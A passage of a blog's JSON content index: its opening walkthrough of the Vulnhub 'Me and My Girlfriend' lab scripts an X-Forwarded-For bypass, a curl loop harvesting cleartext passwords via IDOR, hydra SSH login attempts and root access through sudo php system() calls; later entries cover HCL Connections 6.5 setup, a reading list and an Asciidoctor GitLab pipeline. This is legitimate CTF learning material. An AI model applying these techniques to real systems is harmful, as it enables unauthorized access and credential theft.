ip address of the vulnerable machine.\n== Find IP addresses in your network\nOne way is to use netdiscover, but then you need to enable promiscious mode for the physical network adapter. So I often use nmap.\nnmap -sn 192.168.152.0/24 Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-21 04:24 EST Nmap scan report for 192.168.152.1 Host is up (0.00018s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.152.2 Host is up (0.000065s latency). MAC Address: 00:50:56:FD:D7:08 (VMware) Nmap scan report for 192.168.152.131 Host is up (0.00027s latency). MAC Address: 00:0C:29:83:80:17 (VMware) Nmap scan report for 192.168.152.254 Host is up (0.00012s latency). MAC Address: 00:50:56:FD:D3:38 (VMware) Nmap scan report for 192.168.152.130 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 1.80 seconds -sn means without port scan\nIP Range of the network adapter used for the virtual machine (in my case NAT)\nDHCP Server\nHost\nTarget\nKali Machine (check with ip a)\nPort Scan nmap -A 192.168.152.131 Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-21 04:34 EST Nmap scan report for 192.168.152.131 Host is up (0.00069s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA) | 2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA) | 256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA) |_ 256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (ED25519) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Site doesn\u0026#39;t have a title (text/html). MAC Address: 00:0C:29:83:80:17 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.69 ms 192.168.152.131 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.45 seconds So port 22 and 80 are open and we will start testing with 80.\nFirst curl curl 192.168.152.131 Who are you? Hacker? Sorry This Site Can Only Be Accessed local! \u0026lt;!-- Maybe you can search how to use x-forwarded-for --\u0026gt; Ok, so try with a x-forwarded-for header.\ncurl -L -H \u0026#39;X-Forwarded-For: 127.0.0.1\u0026#39; 192.168.152.131 \u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html lang=\u0026#34;en\u0026#34;\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;UTF-8\u0026#34;\u0026gt; \u0026lt;meta name=\u0026#34;viewport\u0026#34; content=\u0026#34;width=device-width, initial-scale=1.0\u0026#34;\u0026gt; \u0026lt;meta http-equiv=\u0026#34;X-UA-Compatible\u0026#34; content=\u0026#34;ie=edge\u0026#34;\u0026gt; \u0026lt;title\u0026gt;Ceban Corp\u0026lt;/title\u0026gt; \u0026lt;style\u0026gt; .center { text-align: center; } \u0026lt;/style\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;div class=\u0026#34;center\u0026#34;\u0026gt; \u0026lt;h2\u0026gt;Welcome To Ceban Corp\u0026lt;/h2\u0026gt; \u0026lt;p\u0026gt;Inspiring The People To Great Again!\u0026lt;/p\u0026gt; \u0026lt;hr\u0026gt; \u0026lt;p\u0026gt;\u0026lt;a href=\u0026#34;?page=index\u0026#34;\u0026gt;Home\u0026lt;/a\u0026gt; | \u0026lt;a href=\u0026#34;?page=login\u0026#34;\u0026gt;Login\u0026lt;/a\u0026gt; | \u0026lt;a href=\u0026#34;?page=register\u0026#34;\u0026gt;Register\u0026lt;/a\u0026gt; | \u0026lt;a href=\u0026#34;?page=about\u0026#34;\u0026gt;About\u0026lt;/a\u0026gt;\u0026lt;/p\u0026gt; \u0026lt;hr\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; Perfect, so when we inject the header, we get a valid page with more links. So let’s try with a browser and OWASP ZAP .\nBrowser and Intercept Proxy We could use Burpsuite too, but I like to get more used to ZAP, so I added it to my Kali machine.\napt install zaproxy After starting ZAP, I started Firefox through Manual Explore and Launch Browser.\nThe advantage of starting the browser from ZAP is that the SSL Key and Proxy is already configured within the browser.\nZAP can help us and inject the X-Forwarded-For Header to each request. Just hit Ctrl+R or Tools \u0026gt; Replacer Options and add a ZAP Replacer Rule:\nSo now each request which is routed through ZAP gets the additional header.\nI clicked through all available pages, ran dirb and tried some sqli but nothing really useful appeared. So I registered a user account.\nLogon with the registered user was successful. Let’s examine the new pages, one is profile:\nThe Profile shows our name, username and password. The used URL is: http://192.168.152.131/index.php?page=profile\u0026amp;user_id=1284\nI tried changing the user_id value, if I can get other users information and got access to user 1, with Firefox developer tools check the password field:\nSo the password is shown in cleartext ;)\nTo find some valid users and passwords I switched back to curl. In ZAP you can add a script which copies the request as cUrl command.\nAdd \u0026ldquo;Copy curl command\u0026rdquo; Now we can right click a request in the sidebar, or history.\nand get a complete curl command in the script console:\ncurl -i -s -k -X \u0026#39;GET\u0026#39; \\ -H \u0026#39;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\u0026#39; \\ -H \u0026#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\u0026#39;\\ -H \u0026#39;Accept-Language: en-US,en;q=0.5\u0026#39; -H \u0026#39;Connection: keep-alive\u0026#39; \\ -H \u0026#39;Cookie: PHPSESSID=5e8s95uj1bc7te78a1peco7205\u0026#39; \\ -H \u0026#39;Upgrade-Insecure-Requests: 1\u0026#39; -H \u0026#39;X-Forwarded-For: 127.0.0.1\u0026#39; \\ \u0026#39;http://192.168.152.131/index.php?page=profile\u0026amp;user_id=1\u0026#39; So let’s do a loop through 1 to 20 and grep the username and password lines:\nfor ((i=1;i\u0026lt;20;i++)) ; do curl -i -s -k -X \u0026#39;GET\u0026#39; \\ -H \u0026#39;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\u0026#39; \\ -H \u0026#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\u0026#39;\\ -H \u0026#39;Accept-Language: en-US,en;q=0.5\u0026#39; -H \u0026#39;Connection: keep-alive\u0026#39; \\ -H \u0026#39;Cookie: PHPSESSID=5e8s95uj1bc7te78a1peco7205\u0026#39; \\ -H \u0026#39;Upgrade-Insecure-Requests: 1\u0026#39; -H \u0026#39;X-Forwarded-For: 127.0.0.1\u0026#39; \\ \u0026#34;http://192.168.152.131/index.php?page=profile\u0026amp;user_id=$i\u0026#34; \\ | grep \u0026#39;username\\|password\u0026#39; done Replace the single quotes with double quotes, change 1 to $i\nGrep all lines with username or password\nResult\n\u0026lt;label for=\u0026#34;username\u0026#34;\u0026gt;Username\u0026lt;/label\u0026gt; \u0026lt;input type=\u0026#34;text\u0026#34; name=\u0026#34;username\u0026#34; id=\u0026#34;username\u0026#34; value=\u0026#34;eweuhtandingan\u0026#34;\u0026gt;\u0026lt;br\u0026gt; \u0026lt;label for=\u0026#34;password\u0026#34;\u0026gt;Password\u0026lt;/label\u0026gt; \u0026lt;input type=\u0026#34;password\u0026#34; name=\u0026#34;password\u0026#34; id=\u0026#34;password\u0026#34; value=\u0026#34;password\u0026#34;\u0026gt;\u0026lt;br\u0026gt; \u0026lt;label for=\u0026#34;username\u0026#34;\u0026gt;Username\u0026lt;/label\u0026gt; \u0026lt;input type=\u0026#34;text\u0026#34; name=\u0026#34;username\u0026#34; id=\u0026#34;username\u0026#34; value=\u0026#34;aingmaung\u0026#34;\u0026gt;\u0026lt;br\u0026gt; \u0026lt;label for=\u0026#34;password\u0026#34;\u0026gt;Password\u0026lt;/label\u0026gt; \u0026lt;input type=\u0026#34;password\u0026#34; name=\u0026#34;password\u0026#34; id=\u0026#34;password\u0026#34; value=\u0026#34;password\u0026#34;\u0026gt;\u0026lt;br\u0026gt; Not bad, but let’s filter little bit more.\nfor ((i=1;i\u0026lt;20;i++)) ; do curl -i -s -k -X \u0026#39;GET\u0026#39; \\ -H \u0026#39;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\u0026#39; \\ -H \u0026#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\u0026#39;\\ -H \u0026#39;Accept-Language: en-US,en;q=0.5\u0026#39; -H \u0026#39;Connection: keep-alive\u0026#39; \\ -H \u0026#39;Cookie: PHPSESSID=5e8s95uj1bc7te78a1peco7205\u0026#39; \\ -H \u0026#39;Upgrade-Insecure-Requests: 1\u0026#39; -H \u0026#39;X-Forwarded-For: 127.0.0.1\u0026#39; \\ \u0026#34;http://192.168.152.131/index.php?page=profile\u0026amp;user_id=$i\u0026#34; \\ | grep \u0026#39;username\\|password\u0026#39; done \\ | grep -v \\\u0026#34;\\\u0026#34; \\ | grep -v label \\ | awk -F\\\u0026#34; \u0026#39;{print $8}\u0026#39; Remove all line with empty value value=\u0026quot;\u0026quot;\nRemove all results with label\nAwk with delimiter \u0026quot; print Column 8\nNow we have a list with usernames and passwords. Odd lines have usernames, even lines the password. Put this together with another awk and pipe into a file\nfor ((i=1;i\u0026lt;20;i++)) ; do curl -i -s -k -X \u0026#39;GET\u0026#39; \\ -H \u0026#39;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\u0026#39; \\ -H \u0026#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\u0026#39;\\ -H \u0026#39;Accept-Language: en-US,en;q=0.5\u0026#39; -H \u0026#39;Connection: keep-alive\u0026#39; \\ -H \u0026#39;Cookie: PHPSESSID=5e8s95uj1bc7te78a1peco7205\u0026#39; \\ -H \u0026#39;Upgrade-Insecure-Requests: 1\u0026#39; -H \u0026#39;X-Forwarded-For: 127.0.0.1\u0026#39; \\ \u0026#34;http://192.168.152.131/index.php?page=profile\u0026amp;user_id=$i\u0026#34; \\ | grep \u0026#39;username\\|password\u0026#39; done \\ | grep -v \\\u0026#34;\\\u0026#34; \\ | grep -v label \\ | awk -F\\\u0026#34; \u0026#39;{print $8}\u0026#39; \\ | awk \u0026#39;{printf (NR%2==0) ? \u0026#34;:\u0026#34; $0 \u0026#34;\\n\u0026#34; : $0}\u0026#39; \\ | uniq \\ \u0026gt; usernames.txt result is a : seperated list username:password awk '{printf (NR%2==0) ? \u0026quot;:\u0026quot; $0 \u0026quot;\\n\u0026quot; : $0}'\nThis is awk with if/else. So when the line number can be devided without rest, it prints the \u0026ldquo;:\u0026rdquo; + the line and line end \\n, if not it just prints the line.\nSo we have a file with username and password combination and can faster test the logins.\nAn other option could be to pipe all passwords to a file and all users to another file.\nTest SSH Login It’s a short list of users and passwords, but we want to automate and learn, or?\nSo using hydra to test the ssh login.\nhydra -C usernames.txt -u 192.168.152.131 ssh Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-12-21 05:46:53 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 7 tasks per 1 server, overall 7 tasks, 7 login tries, ~1 try per task [DATA] attacking ssh://192.168.152.131:22/ [22][ssh] host: 192.168.152.131 login: alice password: password 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-12-21 05:46:55 Perfect, so we have a login.\nLogin as alice So we login as alice and look around a little bit.\nssh alice@192.168.152.131 ls -al ls -al .my_notes cat .my_notes/flag1.txt Get root Check if alice is allowed to run sudo\nsudo -l User alice may run the following commands on gfriEND: (root) NOPASSWD: /usr/bin/php So alice is allowed to run php without a password through sudo. So we can use system() or shell_exec in a php script.\ntest.php\n\u0026lt;?php system(\u0026#34;ls -al /root\u0026#34;) ?\u0026gt; Run with sudo php test.php\nalice@gfriEND:~$ sudo php test.php total 32 drwx------ 3 root root 4096 Dec 13 14:49 . drwxr-xr-x 22 root root 4096 Dec 13 10:21 .. -rw------- 1 root root 0 Dec 13 14:49 .bash_history -rw-r--r-- 1 root root 3106 Feb 20 2014 .bashrc drwx------ 2 root root 4096 Dec 13 14:14 .cache -rw-r--r-- 1 root root 1000 Dec 13 13:13 flag2.txt -rw------- 1 root root 238 Dec 13 13:44 .mysql_history -rw------- 1 root root 81 Dec 13 14:42 .nano_history -rw-r--r-- 1 root root 140 Feb 20 2014 .profile test2.php\n\u0026lt;?php system(\u0026#34;cat /root/flag2.txt\u0026#34;) ?\u0026gt; Try it sudo php test2.php, this will give you the second flag.\n________ __ ___________.__ ___________.__ ._. / _____/ _____/ |_ \\__ ___/| |__ ____ \\_ _____/| | _____ ____| | / \\ ___ / _ \\ __\\ | | | | \\_/ __ \\ | __) | | \\__ \\ / ___\\ | \\ \\_\\ ( \u0026lt;_\u0026gt; ) | | | | Y \\ ___/ | \\ | |__/ __ \\_/ /_/ \u0026gt;| \\______ /\\____/|__| |____| |___| /\\___ \u0026gt; \\___ / |____(____ /\\___ /__ \\/ \\/ \\/ \\/ \\//_____/ \\/ ","excerpt":"\u003cp\u003eIn my spare time I like doing CTF (Capture the flag) or solving machines posted at \u003ca href=\"https://vulnhub.com\" target=\"_blank\"\u003eVulnhub \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. This time I started Christmas vacation with \u003ca href=\"https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/\" target=\"_blank\"\u003eMe and My Girlfriend: 1 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eExtracting and importing into Vmware Workstation was straight forward, after the start we need to find the ip address of the vulnerable machine.\u003c/p\u003e","ref":"https://stoeps.de/posts/2019/20191221-walkthrough-me-and-my-girlfriend/","title":"Walkthrough: Vulnhub - Me and My Girlfriend"},{"body":"I used the last day before holiday for a first installation of HCL Connections 6.5 on a test system.\nWizards dbWizard.sh creates all databases for the core Connections products.\nI found a folder icec in Wizards/connections.sql, but tried the installation of Connections without it first.\nI could remember, that the installation of Connections 6.0 CR4 or CR5 didn’t run successfully, when the XCC/ICEC database was missing.\nI reviewed the documentation about the database creation, but there was no entry that we need to create the XCC/ICEC database manually.\nUpdate: Documentation contains note now, that you have to create ICEC database manually https://help.hcltechsw.com/connections/v65/admin/install/c_inst_create_database_sql.html?hl=icec populationWizard.sh asked for the configuration properties of databases and LDAP.\nOn this screen a click on Next does nothing in the GUI. I ran the wizard from the console, so I found following message there:\nSo the Wizard checks the LDAP vendor here, I use OpenLDAP in the test environment, so I’m not surprised that the vendor is not recognized, but I would expect a more visible error message in the UI.\nCreate profiles manually I went to Wizards/TDIPopulation/linux/TDI/ and configured profiles_tdi.properties and map_dbrepos_from_source.properties. Double checked with collect_dns.sh if the LDAP connection works and fired up sync_all_dns.sh. All users were provisioned and I could went to the next step of the installation.\nprofiles_tdi.properties most important parts\nsource_ldap_url=ldap://stoeps-cnx-ldap.devops.example.local source_ldap_search_base=dc=devops,dc=example,dc=local source_ldap_search_filter=(uid=u0000*) source_ldap_user_login=cn=ldapadm,dc=devops,dc=example,dc=local {protect}-source_ldap_user_password={encr}nuncPh0xtEJp00bgeT/wfw8NEwVhlfD= dbrepos_jdbc_url=jdbc:db2://cnx65-db2.devops.example.local:50000/peopledb dbrepos_jdbc_driver=com.ibm.db2.jcc.DB2Driver dbrepos_username=db2inst1 {protect}-dbrepos_password={encr}ca38EsQUBvK0= dbrepos_mark_manager_if_referenced=true TDI encrypts/hashes your password, so just use the cleartext password on the first run\nDatabase connection string\nInstallation Installing Connections with the Installation Manager validates the databases:\nYou see here the XCC database is checked and when I tried to validate it, I got the error that the Highlights database is missing.\nCreate ICEC Highlights database The database creation scripts are included in the Wizards package, but we need to start them manually.\ncd Wizards cd Wizards/connections.sql/icec/db2 db2 -tvf createDb.sql db2 -tvf appGrants.sql Now the validation runs through and I could start the installation.\nI exported the databases scripts with dbWizard.sh, but even there the script is not called.\nAs always the real installation ran around half an hour and ends with\nSidebar, Touchpoint, Invite Like HCL promised the last weeks, all announced apps (Touchpoint, Sidebar, Invite and ICEC) were installed with Connections 6.5 and no additional download or install was necessary.\nUntil now I just tested the legacy WebSphere parts, I will do the Orient Me and Kubernetes parts in some days.\nInvite with new Layout I like the new layout of invite:\nSocial Sidebar The social sidebar seems to need some configuration, so I will check the documentation next year.\n","excerpt":"\u003cp\u003eI used the last day before holiday for a first installation of HCL Connections 6.5 on a test system.\u003c/p\u003e","ref":"https://stoeps.de/posts/2019/20191220-install-hcl-connections-6.5/","title":"First install of HCL Connections 6.5"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/linkdump/","title":"Linkdump"},{"body":"First linkdump 2019, it was a busy year until now, with a lot of new topics and tools. Here is a short list of posts and articles I have read the last weeks.\nA quite interesting tool (basic css) for quick web pages: kognise/water.css Devops In Devops we do a lot of scripting, often with bash. Here is a good article on pitfalls.\nBashPitfalls - Greg’s Wiki Security More and more important, you can’t start too early implementing security.\nThe DevOps Security Stack - DevOps.com Announcing GitLab for DevSecOps Post Mortem I like the idea to write down solutions after downtimes, this would cost some time digging into logfiles and write, but in the end it will save time for you and users.\nHow to write an Incident Report / Postmortem Infrastructure as code Since I work with Ansible, Packer and Terraform I don’t miss the time of manual server creation and installation.\nInfrastructure as Code, Part One - CrateDB What is Mutable vs. Immutable Infrastructure? Using Ansible with Terraform Idempotent shell command in Ansible Ansible Idempotency and Configuration Drift Jupyter Advanced Jupyter Notebooks: A Tutorial Books I read some books 2019 (mix of eBook, paper and audio book), here the most important ones:\nLinks pointing to Amazon, no affiliate ones. Please buy your books in your preferred shop.\nPhoenix Project , that’s a must read in my eyes for everybody working in IT.\nInfrastructure as code Devops Handbook My vacation (reading) project: The New World Champion Paper Airplane Book Online Courses I like following such video tutorials, it gives a good entry point to new topics.\nUse Python for Research Introduction to DevOps: Transforming and Improving Operations Kubernetes Certified Administrator by School of Devops Video recordings from GPN Martin Leyrer: Moderne Kommandozeilen Werkzeuge Beyond Monitoring ","excerpt":"\u003cp\u003eFirst linkdump 2019, it was a busy year until now, with a lot of new topics and tools. Here is a short list of posts and articles I have read the last weeks.\u003c/p\u003e\n\u003cp\u003eA quite interesting tool (basic css) for quick web pages: \u003ca href=\"https://github.com/kognise/water.css/blob/master/README.md\" target=\"_blank\"\u003ekognise/water.css \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2019/20190622-linkdump-1_2019/","title":"Linkdump 1/2019"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/reading/","title":"Reading"},{"body":"For GPN19 I prepared a second talk on Documentation with any Editor . The talk was based on a previous one from Froscon 13, but the pipeline tooling changed.\nThis time there was a technical issue during the recording and so there are only the slides available, but you can still watch the video of the Froscon talk: Froscon 13: Documentation with any Editor All scripts and the complete pipeline definition can be found in the GPN19-documentation Gitlab Repository .\ntl;dr I use Asciidoctor for documentation for years. It’s just easy to write, has more options than Markdown and I create all kinds of output for colleagues, customers or the web, just from one source. Converting the source to HTML, PDF, EPUB or several other formats, can be done on the command line of any Operating system, in Docker containers or delivery pipelines. I decided to use the Asciidoctor Docker container with Gitlab CI/CD . One of the advantages of Asciidoctor is that it can be easily put into a version control system like Git. I used Git for storing it since the early beginning, so the step to use a pipeline in combination was easy.\nBut why do I use Gitlab instead of other git software and Jenkins ? To be honest, I think it’s easier to start with Gitlab, because it’s completely integrated. Gitlab is available on premises (Docker container, Kubernetes, bare server) and public on https://gitlab.com .\nGoal As the title of the talk mentions, the main advantage to use a pipeline with Asciidoctor is, that you can edit your documents with the editor of your choice (I often use even VIM in a termux session on my mobile phone or tablet). Conversion happens after commit and push to the git repository.\nAdvantage I can be sure that always the latest version is available, changing something (typos, additional information) doesn’t need any copy \u0026amp; paste to whatever other systems.\nBuilding the pipeline and documents Directory structure and documents\n. ├── docker-asciidoctor │ └── Dockerfile ├── documents-personal │ └── basic-example.adoc ├── documents-work │ ├── _attributes.asciidoc │ ├── basic-example.adoc │ ├── configfiles │ │ └── customization │ │ └── themes │ │ └── Theme │ │ ├── applications │ │ │ └── blogs.css │ │ └── custom.css │ ├── example.adoc │ ├── images │ ├── include │ │ ├── network2.adoc │ │ └── network.adoc │ ├── main-example.adoc │ ├── more.asciidoc │ ├── _variables-linux.asciidoc │ ├── _variables-project.asciidoc │ └── _variables-win.asciidoc ├── images │ ├── diag-4e35056b3ac38736b7ce541f3f9bcced.png │ ├── icons │ │ ├── caution.png │ │ ├── example.png │ │ ├── home.png │ │ ├── important.png │ │ ├── LICENSE │ │ ├── next.png │ │ ├── note.png │ │ ├── prev.png │ │ ├── README.adoc │ │ ├── tip.png │ │ ├── up.png │ │ └── warning.png │ ├── logo.png │ ├── png.png │ └── test.png ├── LICENSE ├── pdftheme │ ├── logo.png │ ├── personal-theme.yml │ └── work-theme.yml ├── presentations │ └── slidedeck.adoc ├── public │ ├── html-personal │ ├── html-work │ ├── images │ ├── pdf-personal │ ├── pdf-work │ └── presentations ├── README.adoc ├── scripts │ ├── create-index.sh │ ├── html-conversion.sh │ ├── html-work-conversion.sh │ ├── pdf-conversion.sh │ ├── pdf-work-conversion.sh │ ├── reveal-conversion.sh │ └── scripts └── wiki-articles Git submodule pointing to https://github.com/asciidoctor/docker-asciidoctor Some example files to include in Asciidoctor\nimages folder used with all asciidoc files\npdftheme for company logo on output\nsome scripts for conversion and generating an overview of all documentation\nOutput folder which is published to Gitlab pages\nThe idea was to put documents to documents-work and it will generate html5 with side toc and pdf with a company logo on the title page. The pdf theme adds a logo, author, pages and copyright to the headers and footers of each page. The personal documents just used the default themes.\nThe folder structure is already prepared for confluence wiki and epub, but it’s not implemented until now.\nPipeline definition Just add .gitlab-ci.yml to your repository and Gitlab will run your defined pipeline.\nBuild and test the Docker container I decided to build the container directly in the Gitlab project, run some tests and put it into the included registry. Running Docker in Docker needs some work on the on premises deployments of Gitlab, but it works out of the box on the public one.\nI add the original Github repository as a submodule to my project.\ngit add submodule https://github.com/asciidoctor/docker-asciidoctor gitlab-ci.yml for building the container and tests\nimage: docker:git services: - docker:dind variables: CONTAINER_TEST_IMAGE: registry.gitlab.com/stoeps/$CI_PROJECT_NAME:$CI_BUILD_REF_NAME CONTAINER_RELEASE_IMAGE: registry.gitlab.com/stoeps/$CI_PROJECT_NAME:latest before_script: - docker login -u gitlab-ci-token -p $CI_BUILD_TOKEN registry.gitlab.com - git submodule sync --recursive - git submodule update --init --recursive stages: - build - test - release build: stage: build script: - docker build -t $CONTAINER_TEST_IMAGE docker-asciidoctor - docker push $CONTAINER_TEST_IMAGE only: changes: - docker-asciidoctor/Dockerfile refs: - master variables: - $BUILDCONTAINER test 1: stage: test script: - echo \u0026#34;Run tests here\u0026#34; - docker run -t --rm $CONTAINER_TEST_IMAGE asciidoctor -v | grep \u0026#34;Asciidoctor\u0026#34; only: changes: - docker-asciidoctor/Dockerfile refs: - master variables: - $BUILDCONTAINER test 2: stage: test script: - docker run -t --rm $CONTAINER_TEST_IMAGE asciidoctor-revealjs -v only: changes: - docker-asciidoctor/Dockerfile refs: - master variables: - $BUILDCONTAINER release-image: stage: release script: - echo \u0026#34;Tag Image and push to registry\u0026#34; - docker pull $CONTAINER_TEST_IMAGE - docker tag $CONTAINER_TEST_IMAGE $CONTAINER_RELEASE_IMAGE - docker push $CONTAINER_RELEASE_IMAGE only: changes: - docker-asciidoctor/Dockerfile refs: - master variables: - $BUILDCONTAINER Use docker:git image (work with git repository)\ndind → Docker in Docker\nDefine Variables (Test image and release image name)\nRun this scripts before the build starts (login in to registry, pull submodule)\n3 Stages used in the pipeline (build, test and release)\nJob build in stage build\nRun only when Dockerfile is newer, in branch master and when the $BUILDCONTAINER variable is true\nJob test1 in stage test\nJob release image in stage release\nGet test image from registry\nTag as release image\nPush to registry\nSo the image build runs only when a variable SBUILDCONTAINER is set to true. I did this to save time, because we don’t need to build the container image multiple times. I decided to create a scheduler for the weekend, which sets the variable and is scheduled all week.\nAnd even then, it needs to be a new Dockerfile to run this.\nA successful build looks like this:\nSo we see our three stages and the different jobs. Splitting into stages has some advantages. First of all, jobs are running parallel in one stage, when a stage (or job) is not successful, the following stages do not run.\nBuild the output documents I decided to run the built of the documents separately, so not the best when you want to save build time, but easier to mount the scripts, images, and documents as volumes into the container. After a successful build, the output is copied to the folder public, a script runs to build an overview html page and then it’s published to Gitlab pages.\nI use the script for an overview because I couldn’t find a way to enable directory index for the Gitlab pages.\nTo do so, I added to additional stages (Conversion and Deploy)\nAfter a successful build, the output is copied to the folder public, a script runs to build an overview html page and then it’s published to Gitlab pages.\nI use the script for an overview because I couldn’t find a way to enable directory index for the Gitlab pages.\n... stages: - build - test - release - conversion - deploy ... pdf:personal: stage: conversion script: - echo \u0026#34;Start Asciidoctor conversion\u0026#34; - echo $CONTAINER_IMAGE:$CI_COMMIT_SHA - docker run -t --rm -v $(pwd)/documents-personal:/documents/ -v $(pwd)/images:/images -v $(pwd)/scripts:/scripts $CONTAINER_RELEASE_IMAGE /scripts/pdf-conversion.sh - cp documents-personal/*.pdf public/pdf-personal artifacts: name: \u0026#34;pdf-personal-$CI_COMMIT_TAG\u0026#34; paths: - public/pdf-personal expire_in: 2 hours except: variables: - $BUILDCONTAINER pdf:work: stage: conversion script: - echo \u0026#34;Start Asciidoctor conversion\u0026#34; - echo $CONTAINER_IMAGE:$CI_COMMIT_SHA - docker run -t --rm -v $(pwd)/documents-work:/documents/ -v $(pwd)/images:/images -v $(pwd)/scripts:/scripts -v $(pwd)/pdftheme:/pdftheme/ $CONTAINER_RELEASE_IMAGE /scripts/pdf-work-conversion.sh - cp documents-work/*.pdf public/pdf-work artifacts: name: \u0026#34;pdf-work-$CI_COMMIT_TAG\u0026#34; paths: - public/pdf-work expire_in: 2 hours except: variables: - $BUILDCONTAINER html: stage: conversion script: - echo \u0026#34;Start Asciidoctor conversion\u0026#34; - echo $CONTAINER_IMAGE:$CI_COMMIT_SHA - docker run -t --rm -v $(pwd)/documents-work:/documents/ -v $(pwd)/images:/images -v $(pwd)/scripts:/scripts $CONTAINER_RELEASE_IMAGE /scripts/html-work-conversion.sh - cp documents-work/*.html public/html-work - docker run -t --rm -v $(pwd)/documents-personal:/documents/ -v $(pwd)/images:/images -v $(pwd)/scripts:/scripts $CONTAINER_RELEASE_IMAGE /scripts/html-conversion.sh - cp documents-personal/*.html public/html-personal artifacts: name: \u0026#34;html-$CI_COMMIT_TAG\u0026#34; paths: - public/html-work - public/html-personal - images expire_in: 2 hours except: variables: - $BUILDCONTAINER reveal: stage: conversion script: - echo \u0026#34;Start Asciidoctor conversion\u0026#34; - echo $CONTAINER_IMAGE:$CI_COMMIT_SHA - docker run -t --rm -v $(pwd)/presentations:/documents/ -v $(pwd)/images:/images -v $(pwd)/scripts:/scripts $CONTAINER_RELEASE_IMAGE /scripts/reveal-conversion.sh - cp presentations/*.html public/presentations artifacts: name: \u0026#34;html-$CI_COMMIT_TAG\u0026#34; paths: - public/presentations - images expire_in: 2 hours except: variables: - $BUILDCONTAINER pages: stage: deploy dependencies: - html - reveal - pdf:personal - pdf:work script: - cp -arvf images/* public/images/ - sh scripts/create-index.sh - chmod +r public -R artifacts: paths: - public expire_in: 1 hour only: refs: - master # this job will affect only the \u0026#39;master\u0026#39; branch except: variables: - $BUILDCONTAINER Job pdf:personal in stage conversion\ndocker command, mounting three volumes into the container and convert to pdf then\nCopy resulting documents to public\nSave artifacts, so the outputs of the conversion are saved\nThis time this runs always, except when $BUILDCONTAINER is true\nThe pages job has the other jobs from stage conversion as dependencies, so their artifacts can be used\nbuild an overview of all converted documents\nGitlab Pages When we now look at https://stoeps.gitlab.io/gpn19-documentation , we see the built overview page.\nCheck https://stoeps.gitlab.io/gpn19-documentation/pdf-work/main-example.pdf for an overview of a converted PDF file with title page, logo, plantuml conversion and so on. The source documents can be found in the repository itself with the same name (but extension .adoc).\n","excerpt":"\u003cp\u003eFor \u003ca href=\"https://entropia.de/GPN19\" target=\"_blank\"\u003eGPN19 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n I prepared a second talk on \u003ca href=\"https://share.stoeps.de/GPN19-DocumentationWithAnyEditor.html\" target=\"_blank\"\u003eDocumentation with any Editor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\nThe talk was based on a previous one from Froscon 13, but the pipeline tooling changed.\u003c/p\u003e\n\u003cp\u003eThis time there was a technical issue during the recording and so there are only the slides available, but you can still watch the video of the Froscon talk:\n\u003ca href=\"https://media.ccc.de/v/froscon2018-2192-documentation_with_any_editor\" target=\"_blank\"\u003eFroscon 13: Documentation with any Editor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2019/20190610-asciidoctor-for-professional-documentation/","title":"Asciidoctor for Professional Looking Documentation"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/devops/","title":"Devops"},{"body":"In the first two parts of this little devops series, I showed build templates with Packer and deploying virtual-machines 